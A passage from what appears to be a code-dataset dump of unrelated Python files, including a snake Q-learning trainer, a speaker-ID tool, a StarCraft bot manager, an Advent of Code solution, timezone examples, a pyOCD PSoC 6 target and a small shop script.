np.max(self.gameScores)) + "| time for 10 games: " + str(round(timeD * 10) / 100))
self.start = time()
# print coeffients
if self.gameCounter % 100 == 0:
print("alpha:", self.alpha)
print("e:", self.e)
print("gamma:", self.gamma)
# decrease alpha / e per 100 moves
if self.gameCounter % 100 == 0:
self.alpha = self.alpha * self.alphaD
if self.e > self.emin:
self.e = self.e / self.ed
self.gameCounter += 1
def onScore(self, state):
    """Reward the previous (state, action) pair after the snake scores.

    Standard Q-learning update:
        Q[s, a] = (1 - alpha) * Q[s, a] + alpha * (reward + gamma * max(Q[s']))

    state -- the new state s' reached after eating.
    """
    estReward = self.Q[state]           # Q-values of the new state s'
    prevReward = self.Q[self.oldState]  # Q-values of the previous state s
    # Map the last action to its Q-vector slot.  Fall back to 0 when
    # oldAction is None (onGameOver resets it) or unrecognised; the original
    # unguarded if-chain left `index` unbound in that case, raising
    # NameError instead of performing an update.
    index = {'U': 0, 'L': 1, 'D': 2, 'R': 3}.get(self.oldAction, 0)
    prevReward[index] = (1 - self.alpha) * prevReward[index] + \
        self.alpha * (self.rewardScore + self.gamma * max(estReward))
    self.Q[self.oldState] = prevReward
# Difficulty settings (frames per second of the game loop)
# Easy      -> 10
# Medium    -> 25
# Hard      -> 40
# Harder    -> 60
# Impossible-> 120
difficulty = 50
# Window size in pixels
frame_size_x = 800
frame_size_y = 500
qLearn = QLearningModel()  # single agent, reused (and trained) across all games
pixelSize = 50  # side length of one board cell in pixels
# Train forever: each outer iteration plays one full game with a fresh snake
# that is 3 segments long, heading right from (100, 50).
while True:
    snake = Snake(100, 50, [[100, 50], [100 - pixelSize, 50], [100 - (2 * pixelSize), 50]], [100, 50])
    game = Game(frame_size_x, frame_size_y, difficulty, snake, pixelSize)
    while game.snake.alive:
        game.step(qLearn, "QLearning")
|
20,790 | 46e0380f4a7742882048ea23abca8da693064f27 | import MFCC
import audio
import numpy as np
import scipy.io.wavfile as wav
from scipy.io import loadmat
import sounddevice as sd
import threading
import ml
import os
import sys
import glob
def main():
    """Interactive speaker-identification CLI.

    Commands (read from stdin):
        record -- capture 7 s of mono audio at 16 kHz
        who    -- play back the recording and print the predicted speaker id
        exit   -- leave the loop

    Returns 0 (process exit status).
    """
    # Trained two-layer network weights produced offline; load the .mat
    # file once instead of parsing it twice as the original did.
    weights = loadmat('ml.mat')
    theta1 = weights['theta1']
    theta2 = weights['theta2']
    signal = []
    sample_rate = 16000  # Hz; must match the rate the model was trained with
    while True:
        cmd = input("Digite um comando")
        print("CMDZAO = " + str(cmd))
        if cmd == "record":
            seconds = 7
            print("recording...")
            signal = sd.rec(int(seconds * sample_rate), samplerate=sample_rate, channels=1)
            sd.wait()  # block until the recording finishes
        elif cmd == "who":
            if not len(signal):
                print("no signal")
                continue
            sd.play(signal, sample_rate)
            # Only the first 2 seconds are used, matching the training window.
            signal = signal[0:int(2 * sample_rate)]
            mfcc = MFCC.main(signal, sample_rate)
            mlres = ml.predictWAV(theta1, theta2, mfcc)
            print("user id: {}".format(mlres[0]))
        elif cmd == "exit":
            break
        else:
            print("not found.")
    return 0

if __name__ == "__main__":
    sys.exit(main())
|
20,791 | cebcf2979610be6b8049ec9a6adf1737d06f52d9 | from typing import List, Dict, Tuple
from sharpy.events import UnitDestroyedEvent
from sharpy.managers import ManagerBase
from sc2 import UnitTypeId, Result
from sc2.unit import Unit
from sharpy.managers.enemy_units_manager import ignored_types
class LostUnitsManager(ManagerBase):
    """Keeps track of lost units. Both ours and enemies."""

    def __init__(self):
        super().__init__()
        # Tags of known hallucinations; their deaths must not count as losses.
        self.hallucination_tags: List[int] = []
        self._my_lost_units: Dict[UnitTypeId, List[Unit]] = {}
        self._enemy_lost_units: Dict[UnitTypeId, List[Unit]] = {}

    async def start(self, knowledge: "Knowledge"):
        await super().start(knowledge)
        knowledge.register_on_unit_destroyed_listener(self.on_unit_destroyed)

    async def update(self):
        pass

    async def post_update(self):
        pass

    def on_unit_destroyed(self, event: UnitDestroyedEvent):
        """Record a destroyed unit, bucketed by its real (base) type."""
        if not event.unit:
            # Event is not useful if we do not know the unit.
            return
        unit = event.unit
        type_id = unit.type_id
        if type_id in ignored_types or unit.tag in self.hallucination_tags:
            return
        # Find a mapping if there is one, or use the type_id as it is
        real_type = self.unit_values.real_type(type_id)
        if unit.is_mine:
            self._my_lost_units.setdefault(real_type, []).append(unit)
            self.print(f"Own unit destroyed, unit {unit}")
        elif unit.is_enemy:
            self._enemy_lost_units.setdefault(real_type, []).append(unit)
            self.print(f"Enemy unit destroyed, unit {unit}")
        else:
            self.print(f"Unknown owner {unit.owner_id} for unit {unit}")

    def calculate_own_lost_resources(self) -> Tuple[int, int]:
        """Calculates lost resources for our own bot.
        Returns a (minerals, gas) tuple."""
        return self._calculate_lost_resources(self._my_lost_units)

    def calculate_enemy_lost_resources(self) -> Tuple[int, int]:
        """Calculates lost resources for an enemy.
        Returns a (minerals, gas) tuple."""
        return self._calculate_lost_resources(self._enemy_lost_units)

    def own_lost_type(self, unit_type: UnitTypeId) -> int:
        """Number of our own lost units of the given type (morphs folded into the base type)."""
        real_type = self.unit_values.real_type(unit_type)
        return len(self._my_lost_units.get(real_type, []))

    def enemy_lost_type(self, unit_type: UnitTypeId) -> int:
        """Number of enemy lost units of the given type (morphs folded into the base type)."""
        real_type = self.unit_values.real_type(unit_type)
        return len(self._enemy_lost_units.get(real_type, []))

    def _calculate_lost_resources(self, lost_units: Dict[UnitTypeId, List[Unit]]) -> Tuple[int, int]:
        """Sum the mineral and gas cost of every unit recorded in lost_units."""
        lost_minerals = 0
        lost_gas = 0
        for unit_type, units in lost_units.items():
            count = len(units)
            lost_minerals += self.unit_values.minerals(unit_type) * count
            lost_gas += self.unit_values.gas(unit_type) * count
        return lost_minerals, lost_gas

    async def on_end(self, game_result: Result):
        self.print_contents()

    def print_contents(self):
        """Log both sides' total lost resources (used at game end)."""
        self.print_end(f"My lost units minerals and gas: {self.calculate_own_lost_resources()}")
        self.print_end(f"Enemy lost units minerals and gas: {self.calculate_enemy_lost_resources()}")

    def print_end(self, msg: str):
        self.knowledge.print(msg, "LostUnitsContents", stats=False)

    def get_own_enemy_lost_units(self) -> Tuple[Dict[UnitTypeId, List[Unit]], Dict[UnitTypeId, List[Unit]]]:
        """Get tuple with own and enemy lost units"""
        return (self._my_lost_units, self._enemy_lost_units)
|
20,792 | d55a28f57f92d37f053db907179b683e78d3e7d8 | import sys
import math
# Advent of Code day 10: parse lines of the form
#   position=<x, y> velocity=<vx, vy>
# into (x, y, vel_x, vel_y) tuples.
points = []
with open('day_10.txt', 'r') as fp:
    for line in fp:
        line = line.strip()
        parts = line.split("<")
        x = int(parts[1].split(',')[0])
        y = int(parts[1].split(',')[1].split('>')[0])
        vel_x = int(parts[2].split(',')[0])
        vel_y = int(parts[2].split(',')[1].split('>')[0])
        points.append((x, y, vel_x, vel_y))
# Current positions only; velocities stay paired by index in `points`.
cur_points = []
for point in points:
    cur_points.append((point[0], point[1]))
def move_points(cur_points):
    """Advance every point by one time step using the matching velocity in `points`."""
    return [(px + vx, py + vy)
            for (px, py), (_, _, vx, vy) in zip(cur_points, points)]
def get_dim(cur_points):
    """Return the bounding box of the points as (min_x, max_x, min_y, max_y).

    An empty input yields (inf, -inf, inf, -inf), matching the fold's
    initial values.
    """
    xs = [p[0] for p in cur_points]
    ys = [p[1] for p in cur_points]
    return (min(xs, default=math.inf), max(xs, default=-math.inf),
            min(ys, default=math.inf), max(ys, default=-math.inf))
def print_points(cur_points):
    """Render the points to stdout as a '#'/'.' grid (x indexes rows, y columns)."""
    min_x, max_x, min_y, max_y = get_dim(cur_points)
    width = abs(max_x - min_x) + 1
    height = abs(min_y - max_y) + 1
    board = [["." for _ in range(min_y, max_y + 1)] for _ in range(width)]
    for px, py in cur_points:
        board[px - min_x][py - min_y] = "#"
    for y in range(height):
        sys.stdout.write("".join(board[x][y] for x in range(width)))
        sys.stdout.write('\n')
def size_of_points(cur_points):
    """Half-perimeter of the bounding box; shrinking means the points are converging."""
    x_lo, x_hi, y_lo, y_hi = get_dim(cur_points)
    return abs(x_hi - x_lo) + abs(y_hi - y_lo)
# Step the simulation until the bounding box stops shrinking: the message
# appears at the minimal configuration, which is the state one step before
# the first growth, i.e. prev_points.
size_decreasing = True
last_size = math.inf
prev_points = None
seconds = 0
while size_decreasing:
    seconds += 1
    prev_points = cur_points
    cur_points = move_points(cur_points)
    size = size_of_points(cur_points)
    size_decreasing = last_size > size
    last_size = size
print_points(prev_points)       # part 1: the message
print(seconds - 1)              # part 2: seconds elapsed at the minimum
print(size_of_points(prev_points))
|
20,793 | a3bf0f0bfdcd171227a0f2f1950bb3ea065b6a66 | import pandas as pd
from sklearn.model_selection import train_test_split
# Linear regression of NYC average yearly temperature against the year.
# Input CSV is expected to have 'Date' and 'Value' columns, where 'Value'
# is the yearly average temperature.
#Change file name
#Change Temp to Value.
nyc = pd.read_csv('ave_yearly_temp_nyc_1895-2017.csv')
#nyc.columns = ['Date', 'Temperature', 'Anomaly']
#rint(nyc.head(3)) # this displays the 1st 3 samples
#print(nyc.Date.values)
#print(nyc.Date.values.reshape(-1,1))
# Split into train/test (default 75%/25%); fixed seed for reproducibility.
# reshape(-1,1) turns the 1-D year array into the 2-D matrix sklearn expects.
x_train, x_test, y_train, y_test = train_test_split( # x is the data # y is the target
    nyc.Date.values.reshape(-1,1), nyc.Value.values,
    random_state=11)
from sklearn.linear_model import LinearRegression
lr = LinearRegression()
lr.fit(X=x_train, y=y_train)
print(lr.coef_)       # slope (degrees per year)
print(lr.intercept_)  # intercept
predicted = lr.predict(x_test)
expected = y_test
# Show every 5th prediction next to the observed value.
for p, e in zip(predicted[::5], expected[::5]):
    print(f"predicted: {p:.2f}, expected: {e: .2f}")
# Manual y = m*x + b predictor built from the fitted coefficients.
predict = (lambda x: lr.coef_ * x + lr.intercept_)
print(predict(2020))
print(predict(1890))
print(predict(2021))
import seaborn as sns
axes = sns.scatterplot(
    data=nyc,
    x='Date',
    y='Value',
    hue='Value',
    palette='winter',
    legend=False
)
axes.set_ylim(10,70)
import numpy as np
# Endpoints of the regression line across the observed year range.
x = np.array([min(nyc.Date.values), max(nyc.Date.values)])
print(x)
y = predict(x)
print(y)
import matplotlib.pyplot as plt
line = plt.plot(x,y)
plt.show()
# the 1st linear regression was for January ( tracks all jan temps)
# the 2nd linear regression was for the end of the year avg temp. As the year goes on
# the temp increases.
#
# (the '12' at the end of each year shows that it's for the whole year)
20,794 | a413b150a7e0a9d6d92a6e8fc27a62c507109631 | '''Timezones'''
# A reminder: it's best to avoid working with timezones. Instead, the best
# practice would be to convert any times/dates to UTC at the start, do all
# your processing in UTC and then convert back to timezones only if you have
# to at the end for the user.

# As it turns out, the web browser knows the user's timezone, and exposes it
# through the standard date and time JavaScript APIs. A good way of utilizing
# this is to let the conversion from UTC to a local timezone happen in the
# web client using JavaScript. There is a small open-source JavaScript library
# called moment.js that handles this very well. Though not demonstrated in this
# file, note that there is a Flask extension called Flask-Moment that makes it
# easy to incorporate moment.js into your Flask app.

# NOTE(review): datetime.utcnow() and datetime.utcfromtimestamp() used below
# are deprecated as of Python 3.12; the modern spelling is
# datetime.datetime.now(tz=datetime.timezone.utc) / fromtimestamp(s, tz=...).

# pytz module
# -----------------------------------------------------------------------------

import datetime
import pytz

# FYI pytz pulls timezone information from this database:
# https://www.iana.org/time-zones

# see all timezones:
for x in pytz.all_timezones:
    print(x)

# see all country codes:
for x in sorted(pytz.country_names):
    print(x, ':', pytz.country_names[x])

# see all country names:
for x in sorted(pytz.country_names):
    print(f'{x}: {pytz.country_names[x]}: {pytz.country_timezones.get(x)}')

# see names, zones and their times:
for x in sorted(pytz.country_names):
    print(f'{x}: {pytz.country_names[x]}')
    if x in pytz.country_timezones:
        for zone in sorted(pytz.country_timezones[x]):
            tz_to_display = pytz.timezone(zone)
            local_time = datetime.datetime.now(tz=tz_to_display)
            print(f'\t{zone}: {local_time}')
    else:
        print('\tNo timezone defined')

# pytz example
# -----------------------------------------------------------------------------

import datetime
import pytz

country = "Europe/Moscow"
tz = pytz.timezone(country)
world_time = datetime.datetime.now(tz=tz)
print(f'UTC is {datetime.datetime.utcnow()}')
# UTC is 2018-03-28 19:39:09.028962
print(f'The time in {country} is {world_time}')
# The time in Europe/Moscow is 2018-03-28 22:39:09.028943+03:00
print(f'In {country} it is {world_time.strftime("%A %x %X")} - {world_time.tzname()}')
# In Europe/Moscow it is Wednesday 03/28/18 22:39:09 - MSK

# convert a naive datetime to an aware datetime
# -----------------------------------------------------------------------------

import datetime
import pytz

naive_local_time = datetime.datetime.now()
naive_utc_time = datetime.datetime.utcnow()
print(f'Naive local time: {naive_local_time}')
print(f'Naive UTC: {naive_utc_time}')
# Naive local time: 2018-03-28 12:39:09.029068
# Naive UTC: 2018-03-28 19:39:09.0290701

# When these next two print you can tell they are aware because they now
# include an offset at the end. Both will show the same time zone and same
# offset (+00:00, UTC) because the naive datetimes we supplied to it don't
# carry that information. The third example shows how to get the correct local
# offset and time zone:

aware_local_time = pytz.utc.localize(naive_local_time)
aware_utc_time = pytz.utc.localize(naive_utc_time)
aware_local_time_zone = pytz.utc.localize(naive_utc_time).astimezone()

print(f'Aware local time: {aware_local_time} - '
      f'time zone: {aware_local_time.tzinfo}')
# Aware local time: 2018-03-28 12:39:09.029068+00:00 - time zone: UTC
print(f'Aware UTC: {aware_utc_time} - '
      f'time zone: {aware_utc_time.tzinfo}')
# Aware UTC: 2018-03-28 19:39:09.029070+00:00 - time zone: UTC
print(f'Aware local time: {aware_local_time_zone} - '
      f'time zone: {aware_local_time_zone.tzinfo}')
# Aware local time: 2018-03-28 12:39:09.029070-07:00 - time zone: PDT

# date in a timezone from epoch
# -----------------------------------------------------------------------------
# Use time stamps (seconds since the epoch) to convert to actual date.
# For this example we'll be supplying the timezone since an epoch number could
# be from anywhere. This particular timestamp is the hour before DST in the UK
# on October 25, 2015. You will see the difference before and after the DST in
# the offset.

s = 1445733000
t = s + (60 * 60)  # one hour later
tz = pytz.timezone("Canada/Pacific")
dt1 = pytz.utc.localize(datetime.datetime.utcfromtimestamp(s)).astimezone(tz)
dt2 = pytz.utc.localize(datetime.datetime.utcfromtimestamp(t)).astimezone(tz)
print(f'{s} seconds since epoch is {dt1}')
print(f'{t} seconds since epoch is {dt2}')
# 1445733000 seconds since epoch is 2015-10-24 17:30:00-07:00
# 1445736600 seconds since epoch is 2015-10-24 18:30:00-07:00
|
20,795 | d9d06321740ed494000f57243cc7d9febb4c7b00 | from game_config import GameConfig
from game_board import GameBoard
from pieces import Pawn, Rook, Knight, Bishop, Queen, King
from chess_operations import GameOps |
20,796 | b6892795aa1a67b7afa3bd9c126c4f836be6cd97 | # pyOCD debugger
# Copyright (c) 2006-2013 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from time import sleep
from .flash_algo_CY8C6xxA import flash_algo as flash_algo_main
from .flash_algo_CY8C6xxA_WFLASH import flash_algo as flash_algo_work
from .flash_algo_CY8C6xxA_SFLASH import flash_algo as flash_algo_sflash
from .flash_algo_CY8C6xxA_SMIF_S25FL512S import flash_algo as flash_algo_smif
from ...core import exceptions
from ...core.coresight_target import CoreSightTarget
from ...core.memory_map import (FlashRegion, RamRegion, RomRegion, MemoryMap)
from ...core.target import Target
from ...coresight.cortex_m import CortexM
from ...utility.timeout import Timeout
LOG = logging.getLogger(__name__)

# Relative time weights (seconds) fed to pyOCD's flash-progress estimation.
ERASE_ALL_WEIGHT = 0.5 # Time it takes to perform a chip erase
ERASE_SECTOR_WEIGHT = 0.05 # Time it takes to erase a page
PROGRAM_PAGE_WEIGHT = 0.07 # Time it takes to program a page (Not including data transfer time)
class CY8C6xxA(CoreSightTarget):
    """Cypress PSoC 6 (CY8C6xxA) dual-core target.

    Core 0 (CM0+) sits behind AP 1 and core 1 (CM4) behind AP 2; both are
    created explicitly instead of relying on pyOCD's generic core discovery.
    """

    VENDOR = "Cypress"

    memoryMap = MemoryMap(
        # Boot ROM.
        RomRegion(start=0x00000000, length=0x20000),
        # Main application flash (2 MB) — boot memory.
        FlashRegion(start=0x10000000, length=0x200000, blocksize=0x200,
                    is_boot_memory=True,
                    erased_byte_value=0,
                    algo=flash_algo_main,
                    erase_all_weight=ERASE_ALL_WEIGHT,
                    erase_sector_weight=ERASE_SECTOR_WEIGHT,
                    program_page_weight=PROGRAM_PAGE_WEIGHT),
        # Work flash (32 KB), separate programming algorithm.
        FlashRegion(start=0x14000000, length=0x8000, blocksize=0x200,
                    is_boot_memory=False,
                    erased_byte_value=0,
                    algo=flash_algo_work,
                    erase_all_weight=ERASE_ALL_WEIGHT,
                    erase_sector_weight=ERASE_SECTOR_WEIGHT,
                    program_page_weight=PROGRAM_PAGE_WEIGHT),
        # Supervisory flash (SFLASH); excluded from flash tests.
        FlashRegion(start=0x16000000, length=0x8000, blocksize=0x200,
                    is_boot_memory=False,
                    erased_byte_value=0,
                    is_testable=False,
                    algo=flash_algo_sflash,
                    erase_all_weight=ERASE_ALL_WEIGHT,
                    erase_sector_weight=ERASE_SECTOR_WEIGHT,
                    program_page_weight=PROGRAM_PAGE_WEIGHT),
        # External quad-SPI (SMIF) flash, S25FL512S; not powered at boot.
        FlashRegion(start=0x18000000, length=0x4000000, blocksize=0x40000, page_size=0x1000,
                    is_boot_memory=False,
                    erased_byte_value=0xFF,
                    is_testable=False,
                    is_powered_on_boot=False,
                    algo=flash_algo_smif,
                    erase_all_weight=140,
                    erase_sector_weight=1,
                    program_page_weight=1),
        # SRAM.
        RamRegion(start=0x08000000, length=0x10000)
    )

    def __init__(self, link, memmap = memoryMap):
        super(CY8C6xxA, self).__init__(link, memmap)

    def create_init_sequence(self):
        # Swap out the generic core-discovery step for the fixed dual-core setup.
        seq = super(CY8C6xxA, self).create_init_sequence()
        seq.replace_task('create_cores', self.create_cy8c6xx7_core)
        return seq

    def create_cy8c6xx7_core(self):
        """Create and register both cores behind their fixed APs.

        NOTE(review): method name says 6xx7 but this target is 6xxA —
        presumably copied from the CY8C6xx7 target; confirm intended.
        """
        core0 = CortexM_CY8C6xxA(self.session, self.aps[1], self.memory_map, 0)
        core0.default_reset_type = self.ResetType.SW_SYSRESETREQ
        core1 = CortexM_CY8C6xxA(self.session, self.aps[2], self.memory_map, 1)
        core1.default_reset_type = self.ResetType.SW_SYSRESETREQ
        self.aps[1].core = core0
        self.aps[2].core = core1
        core0.init()
        core1.init()
        self.add_core(core0)
        self.add_core(core1)
class CortexM_CY8C6xxA(CortexM):
    """Cortex-M core with PSoC6-specific reset handling.

    On this part a reset can drop the debug connection, so the reset paths
    re-initialize the debug port and retry transfers instead of treating a
    TransferError as fatal.
    """

    def reset(self, reset_type=None):
        """Reset the core, then wait for reset to deassert and debug to recover."""
        self.session.notify(Target.EVENT_PRE_RESET, self)
        self._run_token += 1
        if reset_type is Target.ResetType.HW:
            self.session.probe.reset()
            sleep(0.5)  # give the chip time to come out of hardware reset
            self._ap.dp.init()
            self._ap.dp.power_up_debug()
            self.fpb.enable()
        else:
            if reset_type is Target.ResetType.SW_VECTRESET:
                mask = CortexM.NVIC_AIRCR_VECTRESET
            else:
                mask = CortexM.NVIC_AIRCR_SYSRESETREQ
            try:
                self.write_memory(CortexM.NVIC_AIRCR, CortexM.NVIC_AIRCR_VECTKEY | mask)
                self.flush()
            except exceptions.TransferError:
                # The reset itself can abort the transfer; that is expected.
                self.flush()
            # Poll DHCSR until the sticky reset flag clears, re-initializing
            # the debug port whenever a transfer fails mid-reset.
            with Timeout(5.0) as t_o:
                while t_o.check():
                    try:
                        dhcsr_reg = self.read32(CortexM.DHCSR)
                        if (dhcsr_reg & CortexM.S_RESET_ST) == 0:
                            break
                    except exceptions.TransferError:
                        self.flush()
                        self._ap.dp.init()
                        self._ap.dp.power_up_debug()
                        sleep(0.01)
        self.session.notify(Target.EVENT_POST_RESET, self)

    def wait_halted(self):
        """Block until the core halts; raise TimeoutError after 5 s."""
        with Timeout(5.0) as t_o:
            while t_o.check():
                try:
                    if not self.is_running():
                        break
                except exceptions.TransferError:
                    self.flush()
                sleep(0.01)
            else:
                raise exceptions.TimeoutError("Timeout waiting for target halt")

    def reset_and_halt(self, reset_type=None):
        """Reset the core and halt at the application entry point.

        Reads the per-core vector table base register, sanity-checks that it
        points into flash, plants a breakpoint on the reset handler, and
        resets again so execution stops at the user entry.
        """
        self.halt()
        self.reset(reset_type)
        sleep(0.5)
        self.halt()
        self.wait_halted()
        if self.core_number == 0:
            vtbase = self.read_memory(0x40201120)  # VTBASE_CM0
        elif self.core_number == 1:
            vtbase = self.read_memory(0x40200200)  # VTBASE_CM4
        else:
            raise exceptions.TargetError("Invalid CORE ID")
        vtbase &= 0xFFFFFF00
        # Entry must live in one of the flash regions (0x10000000-0x18000000).
        if vtbase < 0x10000000 or vtbase > 0x18000000:
            LOG.info("Vector Table address invalid (0x%08X), will not halt at main()", vtbase)
            return
        entry = self.read_memory(vtbase + 4)  # reset handler from the vector table
        if entry < 0x10000000 or entry > 0x18000000:
            LOG.info("Entry Point address invalid (0x%08X), will not halt at main()", entry)
            return
        self.set_breakpoint(entry)
        self.bp_manager.flush()
        self.reset(self.ResetType.SW_SYSRESETREQ)
        sleep(0.2)
        self.wait_halted()
        self.remove_breakpoint(entry)
        self.bp_manager.flush()
|
# Read an integer, divide it by three, and print the cube of the result.
side_length = int(input())
third = side_length / 3
print(third ** 3)
20,798 | 11a50ff14f89220476887abf108d3fe776e51c58 | from django.urls import path
from django.contrib import admin
from Admin_app import views
# Route table: the Django admin site plus the riders view at the site root.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('',views.riders,name='riders'),
]
|
# Inventory catalog: (name, unit price in dollars, quantity in stock).
# Fixed: the laser range finder's price was written "149,99" (comma instead
# of a decimal point), which silently made it a 4-tuple with price 149 and
# quantity 99.
products = [
    ("Ultrasonic range finder", 2.50, 4),
    ("Servo motor", 14.99, 10),
    ("Servo controller", 44.95, 5),
    ("Microcontroller Board", 34.95, 7),
    ("Laser range finder", 149.99, 2),
    ("Lithium Polymer Battery", 8.99, 8),
]
class Product:
    """A stock item with a name, unit price, and quantity on hand."""

    def __init__(self, name, price, productquantity):
        self.name = name
        self.price = price
        self.productquantity = productquantity

    def stock(self, amount):
        """Return True when at least `amount` units are available."""
        return self.productquantity >= amount

    def cost(self, count):
        """Return the total price for `count` units."""
        return count * self.price

    def remainder(self, count):
        """Deduct `count` units from stock and return the new quantity."""
        self.productquantity -= count
        return self.productquantity
# One Product per catalog row, in the same order as `products`.
# (Explicit [0]/[1]/[2] indexing is kept because the raw tuples may carry
# extra elements; see the laser range finder entry above.)
Finder = Product(products[0][0],products[0][1],products[0][2])
Motor = Product(products[1][0],products[1][1],products[1][2])
Controller = Product(products[2][0],products[2][1],products[2][2])
Board = Product(products[3][0],products[3][1],products[3][2])
lazer = Product(products[4][0],products[4][1],products[4][2])
battery = Product(products[5][0],products[5][1],products[5][2])
prodList = [Finder,Motor,Controller,Board,lazer,battery]
def printStock():
    """Print every product that is still in stock, with its ID and unit price."""
    print()
    print("Available Products")
    print("------------------")
    for idx, item in enumerate(prodList):
        if item.productquantity > 0:
            print(str(idx) + ")", item.name, "$", item.price)
    print()
def main():
    """Interactive purchase loop over the module-level `prodList`.

    Fixes vs. the original:
    - affordability was checked against the *unit* price instead of
      price * quantity, so multi-unit purchases could drive `cash` negative;
    - malformed input (missing quantity, non-numeric tokens) crashed the loop.
    """
    cash = float(input("How much money do you have? $ "))
    while cash > 0:
        printStock()
        vals = input("Enter product ID and quantity you wish to buy: ").split(" ")
        if vals[0] == "quit":
            break
        try:
            prodId = int(vals[0])
            count = int(vals[1])
        except (IndexError, ValueError):
            print("Please enter a product ID and a quantity.")
            continue
        if prodList[prodId].stock(count):
            total = prodList[prodId].cost(count)
            if cash >= total:  # compare against the full cost, not the unit price
                prodList[prodId].remainder(count)
                cash -= total
                print("You purchased", count, prodList[prodId].name+".")
                print("You have $ ", "{0:.2f}".format(cash), "remaining.")
            else:
                print("Sorry, you cannot afford that product.")
        else:
            print("Sorry, we are sold out of", prodList[prodId].name)

main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.